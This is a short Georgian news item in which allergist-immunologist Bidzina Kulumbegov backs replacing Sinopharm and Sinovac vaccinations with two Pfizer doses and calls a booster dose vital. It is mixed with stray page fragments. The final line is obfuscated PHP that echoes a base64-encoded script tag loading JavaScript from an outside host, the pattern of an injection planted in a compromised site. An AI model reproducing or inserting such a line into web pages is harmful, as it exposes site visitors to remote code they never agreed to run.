celsiusi
ავერსი შნაიდერი
მომხრე ვარ, რომ „სინოფარმით“ და „სინოვაკით“ აცრა ორი დოზა „ფაიზერით“ ჩანაცვლდეს, - ამის შესახებ ალერგოლოგ-იმუნოლოგმა, ბიძინა კულუმბეგოვმა იმუნიზაციის საბჭოს სხდომის დასრულების შემდეგ განაცხადა.
 
ექიმი განმარტავს, რომ მისი პოზიცია ვაქცინების ეფექტინობის მაჩვენებლით არის განპირობებული.
 
„ბუსტერული მესამე დოზის დამატება არის სასიცოცხლოდ მნიშვნელოვანი. რაც შეეხება „სინოფარმით“ და „სინოვაკით“ აცრებს, რამდენიმე დღეში იქნება გადაწყვეტილება მიღებული, დღეს მიდის მსჯელობა და მე, როგორც ექიმი, მომხრე ვარ, რომ „სინოფარმი“ და „სინოვაკი“ ორი დოზა „ფაიზერით“ ჩანაცვლდეს“, - განაცხადა კულუმბეგოვმა და დასძინა, რომ ეს ჩანაცვლება ადამიანის სურვილზე იქნება დამოკიდებული.
1654
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");